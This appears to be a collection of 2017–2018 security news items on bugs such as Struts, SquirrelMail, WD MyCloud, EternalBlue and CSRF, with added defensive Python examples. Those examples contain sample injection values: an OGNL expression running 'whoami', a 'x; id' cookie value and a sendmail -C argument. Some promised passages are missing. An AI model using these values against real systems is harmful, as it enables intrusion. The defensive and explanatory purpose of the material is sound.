"The attack can come from a computer or other device that is connected to the internet, so a computer gets hacked, and from there, the robot can be hacked since it's in the same network as the hacked computer," said Cerrudo, who conducted the research alongside Lucas Apa, Senior Security Consultant at IOActive. Unlike computers, robots don't yet store vast amounts of valuable information that the user might be willing to pay a ransom to retrieve. But, as companies often don't have backups to restore systems from, if a robot becomes infected with ransomware it's almost impossible for the user to restore it to normal by themselves. If the alternative for a victim of robot ransomware is waiting for a technician to come to fix the robot, or even losing access to it for weeks if it needs to be returned to the manufacturer, a business owner might view giving in to the ransom demand as the lesser evil. "If it's one robot then it could take less time, but if there are dozens or more, every second they aren't working, the business is losing money. Keeping this in mind, shipping lots of robots takes a lot of time, so the financial impact is bigger when you have a computer compromised with ransomware," said Cerrudo. While the robot ransomware infections were carried out for the purposes of research, and presented at the 2018 Kaspersky Security Analyst Summit in Cancun, Mexico, IOActive warns that if security in robotics isn't properly addressed now, there could be big risks in the near future. "While we don't see robots every day, they're going mainstream soon; businesses worldwide are deploying robots for different services. If we don't start making robots secure now, if more get out there which are easily hacked, there are very serious consequences," said Cerrudo.
As with security vulnerabilities in Internet of Things and other products, the solution to this issue is for robotics manufacturers to think about cybersecurity at every step of the manufacturing process, from day one. IOActive informed Softbank about the research in January, but Cerrudo said: "We don't know if they [Softbank] are going to fix the issues and when, or even if they can fix the issues with the current design." Responding to the IOActive research, a Softbank spokesperson told ZDNet: "We will continue to improve our security measures on Pepper, so we can counter any risks we may face."
While combing through WikiLeaks' Vault 7 data dump, Cisco has unearthed a critical vulnerability affecting 300+ of its switches and one gateway that could be exploited to take over the devices. The flaw is present in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software. "The vulnerability is due to the combination of two factors: the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and the incorrect processing of malformed CMP-specific Telnet options," Cisco explained. "An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device." The extensive and complete list of affected devices is provided in the security advisory. Cisco says that they are not aware of any public announcements or active malicious use of the vulnerability, and that they will provide free software updates to address it (they don't say when). In the meantime, users can mitigate the risk by disabling the Telnet protocol and switching to SSH. If that's not possible, they can reduce the attack surface by implementing infrastructure access control lists. The advisory also includes indicators of compromise that can be used to detect exploitation attempts.
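Both mitigations Cisco names are visible in a device's running configuration, so the practical check is a config audit: every vty stanza should carry transport input ssh, and any stanza that still accepts Telnet should at least have an inbound access-class. The script below is an added example for this page, not part of Cisco's advisory; the running-config text is constructed, and the rule that a vty stanza with no transport input line accepts every protocol (Telnet included) is an assumption about the platform default that you should confirm for your IOS train.

```python
"""Audit a Cisco IOS running-config for the Telnet exposure behind the CMP bug.

Added example, not from Cisco's advisory. It applies the two mitigations
named above mechanically: every 'line vty' stanza should accept SSH only
('transport input ssh'); if Telnet has to stay, the stanza must at least
carry an inbound 'access-class' so only management hosts reach it. The
running-config text is constructed. Assumption: a vty stanza with no
'transport input' line accepts every protocol, Telnet included.
"""

SAMPLE_CONFIG = """\
hostname core-sw1
!
ip access-list standard MGMT-HOSTS
 permit 10.0.100.0 0.0.0.255
 deny   any
!
line con 0
 logging synchronous
line vty 0 4
 transport input telnet ssh
line vty 5 15
 access-class MGMT-HOSTS in
 transport input telnet
!
end
"""


def line_stanzas(config):
    """Yield (name, [indented sub-commands]) for each 'line ...' stanza."""
    name, body = None, []
    for raw in config.splitlines():
        if raw.startswith("line "):
            if name is not None:
                yield name, body
            name, body = raw[len("line "):].strip(), []
        elif name is not None and raw.startswith(" "):
            body.append(raw.strip())
        elif name is not None:          # '!' or any top-level command ends it
            yield name, body
            name, body = None, []
    if name is not None:
        yield name, body


def _has_inbound_acl(body):
    """True if the stanza carries 'access-class <name> in'."""
    for cmd in body:
        parts = cmd.split()
        if parts[:1] == ["access-class"] and "in" in parts[2:]:
            return True
    return False


def audit_vty(config):
    """Return [(vty range, finding)]; an empty list means Telnet is off on
    every vty line."""
    findings = []
    for name, body in line_stanzas(config):
        if not name.startswith("vty"):
            continue
        transport = next((c for c in body if c.startswith("transport input")), None)
        protocols = transport.split()[2:] if transport else ["all"]
        telnet_on = "telnet" in protocols or "all" in protocols
        if telnet_on and not _has_inbound_acl(body):
            findings.append((name, "telnet reachable from anywhere: "
                                   "set 'transport input ssh'"))
        elif telnet_on:
            findings.append((name, "telnet limited by access-class only: "
                                   "still prefer 'transport input ssh'"))
    return findings


if __name__ == "__main__":
    for vty, finding in audit_vty(SAMPLE_CONFIG):
        print("line %s: %s" % (vty, finding))
```

Run it over show running-config output collected from each device on the advisory's affected list; a clean run means no vty line still speaks Telnet, which is the state Cisco recommends until the fixed software ships.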
A flaw in unpatched versions of Windows 10 could leave machines vulnerable to EternalBlue, the remote kernel exploit behind the recent WannaCry ransomware attack. WannaCry targeted a critical Server Message Block (SMB) vulnerability that Microsoft patched with MS17-010 on March 14, 2017. While WannaCry damage was mostly limited to machines running Windows 7, a different version of EternalBlue could infect Windows 10. Researchers at RiskSense stripped the original leaked version of EternalBlue down to its essential components and deemed parts of the data unnecessary for exploitation. They found they could bypass detection rules recommended by governments and antivirus vendors, says RiskSense senior security researcher Sean Dillon. This version of EternalBlue, an exploit initially released by the Shadow Brokers earlier this year, does not use the DoublePulsar payload common among other exploits leaked by the hacker group. DoublePulsar was the main implant used in WannaCry and a key focus for defenders. "That backdoor is unnecessary," says Dillon, noting how it's dangerous for businesses to focus only on DoublePulsar malware. "This exploit could directly load malware onto the system without needing to install the backdoor." EternalBlue gives instant unauthenticated remote access to Windows machines without the MS17-010 patch. While it's difficult to port EternalBlue to additional versions of Windows, it's not impossible. Unpatched Windows 10 machines are at risk, despite the fact that Microsoft's newest OS receives exploit mitigations that earlier versions don't. The slimmed-down EternalBlue can be ported to unpatched versions of Windows 10 and deliver stealthier payloads. Advanced malware would be able to target any Windows machine, broadening the spread of an attack like WannaCry, Dillon explains.
It's worth noting WannaCry was a blatant, obvious attack, he says, and other types of malware, like banking spyware and bitcoin miners, could more easily fly under the radar. "These can infect a network and you won't know about it until years later," he says. "It's a threat to organizations that have been targets, like governments and corporations. Attackers may try to get onto these networks and lay dormant … then steal intellectual property or cause other damage." Dillon emphasizes the importance of updating to the latest version of Windows 10, but says patching alone won't give complete protection from this kind of threat. Businesses with SMB facing the Internet should also put up firewalls, and set up VPN access for users who need external access to the internal network. Businesses should have a good inventory of software and devices on their networks, along with processes for identifying and deploying patches as they are released, says Craig Young, computer security researcher for Tripwire's Vulnerability and Exposures Research Team (VERT). This will become even more critical as attackers move more quickly from patch to exploit. There will always be a window of opportunity for attackers before the right patches are installed, Young notes. EternalBlue is a "very fresh vulnerability," given that most breaches that use exploits leverage flaws that have been publicly known for an average of two years or more. "EternalBlue is a particularly reliable exploit that gives access to execute code at the very highest privilege level, so I would expect that hackers and penetration testers will get a lot of use out of it for years to come," he says.
A decade ago, cross-site request forgery (CSRF, often pronounced "c-surf") was considered to be a sleeping giant, preparing to wake and inflict havoc on the World Wide Web. But the doomsday scenario never materialized, and you don't even seem to hear much about it anymore. In this blog post, part 1 of 2, I will explore this idea and try to understand why the CSRF giant never awoke. First we'll cover the overall threat landscape, trends, and some notable CSRF exploits throughout the years, including one from personal experience. As a quick review, CSRF exists because web applications trust the cookies sent by web browsers within an HTTP request: the browser attaches a site's cookies to a request to that site regardless of which page caused the request. In a CSRF attack, the attacker causes a victim's browser to make a request that results in a change or action which benefits the attacker (and/or harms the victim) in some way. Without a specific defense, such as a random token in the request body that is validated on the server side, CSRF attacks are possible. After a bit of testing, my suspicions were confirmed. All requests that caused any sort of change could be exploited with CSRF. This included: I contacted the company to let them know about these security holes. Surprisingly, they didn't seem to be aware there was such a thing as CSRF, but they thanked me anyway and rolled out a fix about a month later. There have been other notable instances of CSRF vulnerabilities, with some of them being exploited in the wild. Drive-by pharming is an attack on the DNS settings of home routers and modems and often leverages CSRF as a key element. The web UIs on these devices are the culprit, because they allow users to edit configuration settings. In one attack from 2008, banking customers in Mexico who owned 2Wire DSL modems were targeted.
Victims received an email with an embedded image tag carrying a CSRF attack that changed the DNS settings on their modem. In another instance, tens of thousands of Twitter users fell victim to a CSRF worm in 2010 when developers failed to implement anti-CSRF measures for tweets. The vulnerability was discovered and exploited in a rather distasteful but harmless way. When authenticated Twitter users visited the web page containing the exploit, they unknowingly posted two tweets: one with a link to the same page and another with a message about goats. Anyone who clicked on the link in the first tweet also posted the same two tweets. The worm spread like wildfire before it was fixed by Twitter. In 2012 Facebook's App Center was vulnerable to CSRF, and the security researcher who discovered the flaw was awarded $5000 as a bounty. Interestingly, in this case the HTTP request included an anti-CSRF token that appeared at first glance to provide protection, but the token was not being validated by the server-side application when the request was received. A Qualys researcher found other examples where anti-CSRF tokens were not properly validated. And similar to the Facebook issue mentioned above, PayPal in 2016 did not validate the anti-CSRF token in paypal.me. An attacker could only change a user's profile photo in that case, however.
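The Facebook App Center and paypal.me cases above share one failure mode: a token travels with the request, so a tester who only looks at the form believes the site is protected, yet the server never compares it with anything. The following is an added example for this page, not code from any of the sites discussed. It models a state-changing handler three ways (no token, token present but ignored, token validated) as plain functions that take the cookies and form fields a browser would send; the session store, cookie name and field names are assumptions, and forged_request() models what an attacker's page can cause the victim's browser to submit.

```python
"""CSRF token handling: the 'token present but never validated' failure mode.

Added example, not code from any of the sites discussed. A tiny request
handler is modelled as a function taking the cookies and form fields a
browser would send. Three handlers are shown: one with no token (classic
CSRF), one that carries a token but, like the Facebook App Center and
paypal.me cases, never checks it server-side, and one that validates it.
The session store, cookie name and field names are assumptions.
"""
import hmac
import secrets

# Constructed server-side session store: session id -> per-session state.
SESSIONS = {
    "sess-victim": {"user": "alice", "csrf": secrets.token_hex(16)},
}


def issue_csrf_token(session_id):
    """Return the random token bound to this session; the page template embeds
    it as a hidden form field, so only pages this site serves can know it."""
    return SESSIONS[session_id]["csrf"]


def _session(cookies):
    return SESSIONS.get(cookies.get("sid"))


def change_email_no_token(cookies, form):
    """Vulnerable: the cookie alone authorises the change, so any site the
    victim visits can submit this form on their behalf."""
    sess = _session(cookies)
    if sess is None:
        return 401, "not logged in"
    sess["email"] = form["email"]
    return 200, "email changed"


def change_email_unchecked_token(cookies, form):
    """Still vulnerable: the form carries a token, but the server only checks
    that a session exists and never compares the token with the stored one."""
    sess = _session(cookies)
    if sess is None:
        return 401, "not logged in"
    form.get("csrf_token")          # read, then ignored: this is the bug
    sess["email"] = form["email"]
    return 200, "email changed"


def change_email_validated(cookies, form):
    """Fixed: reject unless the submitted token equals the one bound to the
    session. hmac.compare_digest keeps the comparison constant-time."""
    sess = _session(cookies)
    if sess is None:
        return 401, "not logged in"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, sess["csrf"]):
        return 403, "csrf token missing or invalid"
    sess["email"] = form["email"]
    return 200, "email changed"


def forged_request(handler):
    """What an attacker's page can cause: the victim's browser attaches the
    session cookie automatically, but the attacker cannot read the victim's
    real token, so the best it can do is send a guess."""
    cookies = {"sid": "sess-victim"}
    form = {"email": "attacker@example.com", "csrf_token": "guess"}
    return handler(cookies, form)


if __name__ == "__main__":
    for h in (change_email_no_token, change_email_unchecked_token,
              change_email_validated):
        print(h.__name__, forged_request(h))
```

When testing a site, the distinguishing step is the one the bounty hunters took above: replay the request with the token removed or altered; if the change still goes through, the token is decoration.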
The big security issue of the week is a remote code execution hole related to the Cisco WebEx service. WebEx is a popular collaboration tool for online events such as meetings, webinars and videoconferences. Like many services of this sort, you access online events via your browser, augmented by a special-purpose browser extension. Browser extensions and plugins allow web developers to extend the software features inside your browser with a mixture of scripts and program code, for example to add configuration options or to support new audio and video formats. Of course, when you add another layer of programmatic complexity on top of an already complex browser, it's easy to add new security holes, too. Perhaps the best known example of a problematic plugin is Adobe Flash, which has provided cybercrooks with such a fruitful source of exploitable security holes over the years that we have long been urging you to try to live without Flash altogether. The latest security scare of this sort has been assigned CVE-2017-3823, and it applies to Cisco's special-purpose WebEx browser extension. In other words, if your organisation uses WebEx, you probably have the browser extension installed, and if you have it installed, you may be at risk. According to Tavis Ormandy at Google's Project Zero, who discovered and documented the bug, there are more than 20 million WebEx users worldwide. According to Cisco, Internet Explorer, Chrome and Firefox on Windows are affected. Microsoft Edge on Windows and all browsers on Mac and Linux are safe. The most recent update for Chrome is Cisco WebEx extension 1.0.7. Cisco published a notification about this update at 2017-01-26T19:45Z, having issued and then withdrawn 1.0.3 and then 1.0.5 earlier this week after deeming them "incomplete".
However, at 2017-01-26T19:45Z, Cisco's official Security Advisory page says: "Cisco is currently developing updates that address this vulnerability for Firefox and Internet Explorer. There are no workarounds that address this vulnerability." Using Microsoft Edge on Windows or any browser on Mac or Linux will shield you from this bug because it doesn't apply on those platforms. You can also turn off WebEx support in your browser temporarily, thus preventing the Cisco extension or add-on from activating unexpectedly.
Discovered by a security researcher who goes by the name of Zenofex, these security flaws have not been reported to Western Digital, are still unpatched, and public exploit code is available for more than half of the vulnerabilities. According to Zenofex, multiple WD MyCloud NAS device models are affected, such as: Zenofex's decision not to inform Western Digital came after the researcher attended a security conference last year, where other infosec professionals complained about Western Digital ignoring vulnerability reports. It was at the same conference, Black Hat USA 2016, where Western Digital also won a Pwnie Award in a category called "Lamest Vendor Response." "Ignoring these bugs would leave the vulnerable devices online for longer periods while responsible disclosure is worked out," Zenofex argued in explaining his decision not to wait until Western Digital patches the security bugs. "Instead we're attempting to alert the community of the flaws and hoping that users remove their devices from any public facing portions of their networks, limiting access wherever possible," he added. Zenofex, who's a member of the Exploitee.rs community, says he found a whopping total of 85 security issues. Based on the exploit code, many of these security flaws can be exploited by altering cookie values or embedding shell commands in cookie parameters. When the image loads inside their browser, the exploit code executes against the local NAS drive and takes over the device.
The most severe of these issues, according to Zenofex, is an authentication bypass, which ironically was also the easiest to exploit, requiring only the modification of cookie session parameters. And since Murphy's Law applies to hardware devices as well, things went wrong all the way: the injected commands aren't executed under a limited user but run as root, giving attackers full control over affected devices and allowing them to upload or download data at will.
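The two bug classes Zenofex describes, a session cookie whose fields the server believes without checking and cookie values spliced into shell commands, are worth seeing side by side with the pattern that avoids both. The following is an added example for this page and is not the MyCloud firmware's code, which the article does not reproduce. The vulnerable handler models a naive CGI script; the hardened one accepts only HMAC-signed session cookies and builds an argument list for subprocess rather than a shell string. Cookie names, the share path and the key are assumptions, and nothing here executes a command.

```python
"""Why trusting cookie parameters is fatal: auth bypass and command injection.

Added example, not the MyCloud firmware's code (which the article does not
reproduce). It models the two bug classes described above, a session cookie
whose fields the server believes without checking and cookie values spliced
into shell commands, beside a hardened version that only accepts HMAC-signed
session cookies and never hands cookie data to a shell. Cookie names, the
share path and the key are assumptions; no command is executed.
"""
import hashlib
import hmac
import re

SECRET_KEY = b"constructed-server-side-key"   # assumption: held only by the NAS


# --- vulnerable pattern --------------------------------------------------

def vulnerable_handler(cookies):
    """Return (is_admin, command) the way a naive CGI script decides them.
    Whatever the client put in the cookie is believed, and the username is
    pasted into a shell command line as-is, so 'x; id' runs 'id' as root."""
    is_admin = cookies.get("role") == "admin"          # attacker sets role=admin
    user = cookies.get("username", "")
    command = "ls -l /shares/%s" % user                # later passed to a shell
    return is_admin, command


# --- hardened pattern ----------------------------------------------------

def sign_session(user, role):
    """Server mints 'user|role|mac'; the mac covers the fields it vouches for."""
    payload = "%s|%s" % (user, role)
    mac = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return "%s|%s" % (payload, mac)


def verify_session(cookie):
    """Return (user, role) only if the mac matches; None for anything else."""
    try:
        user, role, mac = cookie.split("|")
    except ValueError:
        return None
    payload = "%s|%s" % (user, role)
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return user, role


USERNAME_RE = re.compile(r"^[a-z][a-z0-9_-]{0,31}$")


def hardened_handler(cookies):
    """Return (is_admin, argv) or None. The role comes from the verified
    cookie, the username must match a strict allowlist, and the command is an
    argv list for subprocess.run(argv) with shell=False, so no shell parses it."""
    session = verify_session(cookies.get("session", ""))
    if session is None:
        return None
    user, role = session
    if not USERNAME_RE.match(user):
        return None
    argv = ["ls", "-l", "/shares/%s" % user]
    return role == "admin", argv


if __name__ == "__main__":
    print(vulnerable_handler({"role": "admin", "username": "x; id"}))
    print(hardened_handler({"session": sign_session("alice", "user")}))
    print(hardened_handler({"session": "alice|admin|forged"}))
```

Note that the hardened version still keeps the device process unprivileged in a real deployment; signing cookies stops the bypass, the allowlist and argv list stop the injection, and running as root would only matter for whatever bug comes next.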
A flaw in Safari that allows an attacker to spoof websites and trick victims into handing over their credentials has yet to be patched. A browser address bar spoofing flaw was found by researchers this week in Safari, and Apple has yet to issue a patch for it. Researcher Rafay Baloch on Monday disclosed two proof-of-concepts revealing how vulnerabilities in Edge browser 42.17134.1.0 and Safari on iOS 11.3.1 could be abused to manipulate the browsers' address bars, tricking victims into thinking they are visiting a legitimate website. Baloch told Threatpost Wednesday that Apple has promised to fix the flaw in its next security update for Safari. "Apple has told [me] that the latest beta of iOS 12 also addresses the issue, however they haven't provided any dates," he said. Apple did not respond to multiple requests for comment from Threatpost. Microsoft for its part fixed the vulnerability Baloch found in the Edge browser (CVE-2018-8383) in its August Patch Tuesday release. According to Microsoft's vulnerability advisory released August 14, the spoofing flaw exists because Edge does not properly parse HTTP content. Both flaws stem from the Edge and Safari browsers allowing JavaScript to update the address bar while the page is still loading. This means that an attacker could request data from a non-existent port and, during the delay induced by a setInterval timer, trigger the address bar spoofing.
The browser would then preserve the address bar and load the content from the spoofed page, Baloch said in his blog post breaking down both vulnerabilities. From there, the attacker could spoof the website, using it to lure in victims and potentially gather credentials or spread malware. For instance, the attacker could send an email message containing the specially crafted URL to the user, convince the user to click it, and take them to a page that could gather their credentials or sensitive information. "As per Google, the address bar is the only reliable indicator for ensuring the identity of the website; if the address bar points to Facebook.com and the content is hosted on the attacker's website, there is no reason why someone would not fall for this," Baloch told Threatpost. In a video demonstration, Baloch showed how he could visit a link for the vulnerable browser on Edge (http://sh3ifu[.]com/bt/Edge-Spoof.html), which would take him to a site purporting to be the Gmail login. However, while the URL points to a Gmail address, the content is hosted on sh3ifu.com, said Baloch. The Safari proof-of-concept is similar, except for one constraint: it does not allow users to type their information into the input boxes while the page is in a loading state. However, Baloch said he was able to circumvent this restriction by injecting a fake keyboard using JavaScript, a common practice on banking sites. No other browsers, including Chrome or Firefox, were discovered to have the flaw, said Baloch. Baloch is known for discovering similar vulnerabilities in Chrome, Firefox and other major browsers in 2016, which also allowed attackers to spoof URLs in the address bar.
The vulnerabilities were disclosed to both Microsoft and Apple, and Baloch gave both a 90-day deadline before he went public with the flaws. Because the Safari browser bug is unpatched, Baloch said he has not yet released a proof of concept: "However considering there is a slight difference between the Edge browser POC and Safari, anyone with decent knowledge of Javascript can make it work on Safari," he told us.
Cisco's Talos says it has observed active attacks against a zero-day vulnerability in Apache Struts, a popular Java application framework. Cisco started investigating the vulnerability shortly after it was disclosed, and found a number of active attacks. In an advisory issued on Monday, Apache says the problem with Struts exists within the Jakarta Multipart parser. "It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user," the warning explained. "If you are using Jakarta based file upload Multipart parser, upgrade to Apache Struts version 2.3.32 or 2.5.10.1. You can also switch to a different implementation of the Multipart parser." The alternative is the Pell parser plugin, which uses Jason Pell's multipart parser instead of the Commons FileUpload library, Apache explains. In addition, administrators concerned about the issue could just apply the proper updates, which are currently available. In a blog post, Cisco said it discovered a number of attacks that seem to be leveraging a publicly released proof-of-concept to run various commands. Such commands include simple ones ('whoami') as well as more sophisticated ones, including pulling down a malicious ELF executable and running it.
An example of one attack, which attempts to copy the file to a harmless directory, ensure the executable runs, and ensure that the firewall is disabled at boot-up, is below:

Both Cisco and Apache urge administrators to take action, either by patching or by ensuring their systems are not vulnerable. This isn't the first time the Struts platform has come under attack. In 2013, Chinese hackers were using an automated tool to exploit known vulnerabilities in order to install a backdoor.
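Apache's own description of the bug gives defenders a cheap signal: a legitimate Content-Type is a media type (type/subtype plus optional parameters), while the attacks Cisco saw send something that is not one at all. The public proof-of-concept places an OGNL expression in the header, which Struts echoed into the error message and evaluated. The detector below is an added example for this page, not Cisco's or Apache's code; it grades a Content-Type value as a valid media type, as carrying expression markers, or as malformed, and runs that over constructed log lines whose layout (source, method, path, quoted content-type) is an assumption about your log format.

```python
"""Flag HTTP requests whose Content-Type could not be a legitimate media type,
the shape of the Struts Jakarta Multipart attacks Cisco observed.

Added example, not Cisco's or Apache's code. A well-formed Content-Type is
'type/subtype' plus optional ';name=value' parameters (RFC 7231, using the
RFC 7230 token character set); the public exploit instead sends an OGNL
expression, which Struts echoed into its error message and evaluated. The
log lines are constructed, and the field layout (source, method, path,
content-type in quotes) is an assumption about the log format.
"""
import re

_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_MEDIA_TYPE_RE = re.compile(
    r"^\s*" + _TOKEN + "/" + _TOKEN                       # type/subtype
    + r"(?:\s*;\s*" + _TOKEN + r"=(?:" + _TOKEN + r"|\"[^\"]*\"))*"  # ;p=v
    + r"\s*$"
)
# Markers of an expression where a media type belongs.
_EXPRESSION_RE = re.compile(r"%\{|\$\{|#_memberAccess|ognl", re.IGNORECASE)


def classify_content_type(value):
    """'ok' for a syntactically valid media type, 'expression' if the value
    carries OGNL-style markers, 'malformed' for anything else (still worth a
    look, since the parser raised on it)."""
    if _EXPRESSION_RE.search(value):
        return "expression"
    if _MEDIA_TYPE_RE.match(value):
        return "ok"
    return "malformed"


_LOG_RE = re.compile(
    r'^(?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) ct="(?P<ct>[^"]*)"'
)


def suspicious_requests(log_text):
    """Return [(src, path, verdict)] for lines whose Content-Type is not 'ok'."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_content_type(m.group("ct"))
        if verdict != "ok":
            hits.append((m.group("src"), m.group("path"), verdict))
    return hits


# Constructed sample: two normal requests and two probes against the upload
# endpoint that the Jakarta Multipart parser handles.
SAMPLE_LOG = """\
10.0.0.5 POST /app/upload.action ct="multipart/form-data; boundary=----abc123"
10.0.0.6 POST /app/api ct="application/json; charset=utf-8"
203.0.113.9 POST /app/upload.action ct="%{(#_='multipart/form-data').(#cmd='whoami')}"
203.0.113.9 GET /app/ ct="not a media type at all"
"""

if __name__ == "__main__":
    for src, path, verdict in suspicious_requests(SAMPLE_LOG):
        print("%s %s %s" % (verdict, src, path))
```

The grammar check is the durable half: it keeps catching variants that drop the literal markers, because whatever the attacker sends still has to be something the multipart parser rejects before the vulnerable error path runs.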
Global software industry advocate BSA | The Software Alliance is warning Australian organisations to be mindful of the security risks involved in using unlicensed software after it reached a record number of infringement settlements last year. A total of 28 case settlements for the use of unlicensed software occurred in 2017, twice the number in 2016. The 28 settlements were worth more than $347,000 in damages against businesses across Australia. BSA warns that with the Notifiable Data Breaches legislation now in effect, this is a good time for organisations to consider the risks unlicensed software brings to their business. "Businesses need to remember that unlicensed software, or software downloaded from an unknown source, may contain malware which puts an organisation and its customers at significant risk of becoming the victim of a data breach," comments BSA APAC's director of compliance programs, Gary Gan. "Without properly licensed software, organisations don't receive patch updates which strengthen the software's security and address vulnerabilities, which otherwise would leave the business exposed." One of the 28 settlements involved a Western Australia-based energy company that was found using unlicensed software. The settlement amounted to more than $40,000. Every business caught using unlicensed software had to purchase genuine software licenses for ongoing use on top of the copyright infringement damages. "It's especially important that organisations are ensuring they're doing all they can to protect their data given the recent introduction of NDB legislation. In order to stay on top of their software licensing, businesses should consider investing in SAM tools.
The potential consequences faced by businesses that are found to be using unlicensed software far outweighs the cost of investment into SAM , something that all businesses should be considering , ” Gan continues . The BSA continues to clamp down on unlawful use of its members ’ software . Members include Adobe , Apple , IBM , Microsoft , Okta , Oracle , Symantec , Trend Micro and Workday , amongst others . BSA offers up to $ 20,000 to eligible recipients who disclose accurate information regarding unlawful copying or use of BSA members ’ software . Potential recipients must provide assistance and evidence to support the information , as may be required by the BSA ’ s legal advisers , in connection with any claim or legal proceedings initiated by the BSA members . BSA says it remains committed to its role in raising awareness of the risks to businesses when using unlicensed software and the damaging effects that software piracy has on the Australian IT industry .
Ransomware is costing UK companies a whopping £346 million every year, despite Britain being labelled ‘the most resolute’ country for dealing with these attacks. In fact, more than 40 per cent of mid-to-large UK businesses suffered on average five ransomware attacks during the last year, according to research by Vanson Bourne. However, 92 per cent of security professionals feel confident in their ability to combat ransomware in the future. And there was more good news for British firms: the survey found the UK to be the most resolute, both in refusing to pay ransom demands and in combating the attacks. UK businesses experience the fewest attacks (40 per cent, versus 70 per cent in Germany, 59 per cent in France and 55 per cent in the USA) and enjoy a 43 per cent success rate in defending against them. The research, commissioned by SentinelOne, reveals that ransomware is costing individual businesses around the globe an average of £591,238 per annum. The research also concluded that the number of companies ravaged by ransomware is on the rise: the overall percentage of companies experiencing ransomware has increased from 48 per cent in 2016 to 56 per cent in 2018, although the average number of attacks per year has fallen from six to five. The amount of time spent remediating ransomware attacks has also increased, from 33 to 40 man-hours. The study also reveals that employees are considered the major culprits responsible for introducing the malware into the business. This was further supported by the fact that phishing, which seeks to socially engineer employees, was the top attack vector by which ransomware infiltrated the business in 69 per cent of instances. Migo Kedem, director of Product Management at SentinelOne, said: “It’s staggering to see the cost to British businesses of £346 million.
This figure shows that businesses are becoming increasingly aware that it’s not just the ransom demand, but rather the ancillary costs of downtime, staff time, lost business, as well as the data recovery costs and reputational damage that are the biggest concern to British businesses.” He added: “On a more positive note, it’s good to see CISOs feeling more bullish about their ability to tackle ransomware using the latest behavioural AI-based endpoint technology. It’s also encouraging to see a clear movement against companies caving in to ransomware demands, preferring instead to take more proactive measures such as back-ups and patching of vulnerable systems. However, the volume of ransomware attacks is still increasing, and their speed, scale, sophistication and success in evading detection, with the growth in file-less and memory-based malware, explain why ransomware will continue to be a major threat to CISOs in 2018 and beyond.”
Users of the open source webmail software SquirrelMail are exposed to remote code execution due to a bug (CVE-2017-7692) discovered independently by two researchers. “If the target server uses Sendmail and SquirrelMail is configured to use it as a command-line program, it’s possible to trick sendmail into using an attacker-provided configuration file that triggers the execution of an arbitrary command,” the explanation provided by MITRE reads. “For exploitation, the attacker must upload a sendmail.cf file as an email attachment, and inject the sendmail.cf filename with the -C option within the ‘Options > Personal Informations > Email Address’ setting.” The bug was found by researchers Filippo Cavallarin and Dawid Golunski, independently of one another, and affects SquirrelMail versions 1.4.22 and below. Golunski reported it to SquirrelMail’s sole developer, Paul Lesniewski, who asked for publication of the details to be delayed until he could fix the flaw. But after Cavallarin published details about it last week (having received no reply from the SquirrelMail developer), Golunski did the same over the weekend. Both researchers provided a proof-of-concept exploit for the flaw, and Cavallarin even offered an unofficial patch for plugging the hole. All this prompted Lesniewski to push out a patch on Monday, along with new, patched version snapshots of the software (1.4.23-svn and 1.5.2-svn). He also told The Register that exploitation of the bug is difficult to pull off.
“In order to exploit the bug, a malicious user would need to have already gained control over a mail account by other means; SquirrelMail would need to be configured to allow users to change their outgoing email address (we recommend keeping this disabled); the user would need to determine the location of the attachments directory (by gaining shell access or making guesses); the permissions on said directory and files would need to allow access by other processes (by default this will usually be the case, but prudent admins will exert more stringent access controls); and of course, SquirrelMail needs to be configured to send via Sendmail and not SMTP (the default is SMTP),” he explained. Still, according to Golunski, the 1.4.23 version snapshot offered on Monday was still vulnerable. Another one was pushed out today, so it’s possible that the issue has now been definitively fixed. Users can wait to update their installation until things become clearer; in the meantime, they can protect themselves by configuring their systems to send via SMTP rather than Sendmail.
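The bug class behind CVE-2017-7692 is argument injection: a user-controlled address is pasted into a sendmail command line, and a space inside it becomes a separate argument, so sendmail's -C <config file> option can be smuggled in. The following is an added illustration, not SquirrelMail's code or its actual patch; the sendmail path, the argument order and the strict address pattern are assumptions. It contrasts the vulnerable whitespace-split construction with a builder that validates the sender and passes it as a single argv element without a shell.

```python
import re

SENDMAIL = "/usr/sbin/sendmail"  # assumed path; adjust for the host

# Constructed attacker value for the "Email Address" setting: a real-looking
# address followed by sendmail's -C option naming an uploaded attachment.
MALICIOUS_FROM = "attacker@example.com -C/var/local/squirrelmail/data/attach/evil.cf"

# Address shape accepted by the hardened builder (an assumption for this
# example; a production mailer may use a fuller RFC 5322 parser).
ADDR_RE = re.compile(r"^[A-Za-z0-9._%+=-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")


def build_argv_unsafe(from_addr: str) -> list:
    """Vulnerable pattern: the sender is pasted into a command string that is
    later split on whitespace (as a shell does), so a space inside the value
    smuggles extra argv entries, here sendmail's -C <config file> option."""
    command = f"{SENDMAIL} -i -t -f{from_addr}"
    return command.split()


def build_argv_safe(from_addr: str) -> list:
    """Hardened pattern: validate the sender, refuse anything that could be
    parsed as an option, and pass it as one argv element with no shell."""
    if from_addr.startswith("-") or not ADDR_RE.fullmatch(from_addr):
        raise ValueError(f"refusing suspicious envelope sender: {from_addr!r}")
    return [SENDMAIL, "-i", "-t", "-f", from_addr]


def injected_options(argv: list) -> list:
    """Option-looking tokens that appear after the -f sender: with the unsafe
    builder these are exactly what the attacker smuggled in."""
    found, seen_sender = [], False
    for tok in argv[1:]:
        if seen_sender and tok.startswith("-"):
            found.append(tok)
        if tok.startswith("-f"):
            seen_sender = True
    return found


if __name__ == "__main__":
    print(build_argv_unsafe(MALICIOUS_FROM))
    print(injected_options(build_argv_unsafe(MALICIOUS_FROM)))
    try:
        build_argv_safe(MALICIOUS_FROM)
    except ValueError as err:
        print(err)
```

The same validation belongs where the "Email Address" preference is saved, not only at send time, and the page's own mitigation (deliver via SMTP rather than a sendmail binary) removes the command line entirely.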
